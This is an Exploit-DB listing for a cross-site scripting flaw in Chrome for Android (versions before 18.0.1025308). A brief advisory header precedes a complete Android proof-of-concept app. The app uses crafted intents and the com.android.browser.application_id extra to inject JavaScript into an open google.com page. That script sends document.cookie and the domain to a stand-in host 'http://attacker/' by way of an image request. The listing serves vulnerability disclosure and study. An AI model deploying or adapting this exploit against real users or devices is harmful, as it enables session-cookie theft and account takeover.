Google Chrome for Android - com.android.browser.application_id Intent Extra Data Cross-Site Scripting

EDB-ID:

37792




Platform:

Android

Date:

2012-09-12


source: https://www.securityfocus.com/bid/55523/info

Google Chrome for Android is prone to multiple vulnerabilities.

Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.

Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 

package jp.mbsd.terada.attackchrome1;
  
  import android.app.Activity;
  import android.os.Bundle;
  import android.content.Intent;
  import android.net.Uri;
  
  public class Main extends Activity {
      @Override
      public void onCreate(Bundle savedInstanceState) {
          super.onCreate(savedInstanceState);
          setContentView(R.layout.main);
          doit();
      }
  
      // get intent to invoke the chrome app
      public Intent getIntentForChrome(String url) {
          Intent intent = new Intent("android.intent.action.VIEW");
          intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
          intent.setData(Uri.parse(url));
          return intent;
      }
  
      public void doit() {
          try {
              // At first, force the chrome app to open a target Web page
              Intent intent1 = getIntentForChrome("http://www.google.com/1");
              startActivity(intent1);
  
              // wait a few seconds
              Thread.sleep(3000);
  
              // JS code to inject into the target (www.google.com)
              String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                  + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                  + "document.body.appendChild(img);";
  
              Intent intent2 = getIntentForChrome(jsURL);
  
              // Trick to prevent Chrome from opening the JS URL in a different tab
              intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
              intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
  
              // Inject JS into the target Web page
              startActivity(intent2);
          }
          catch (Exception e) {}
      }
  }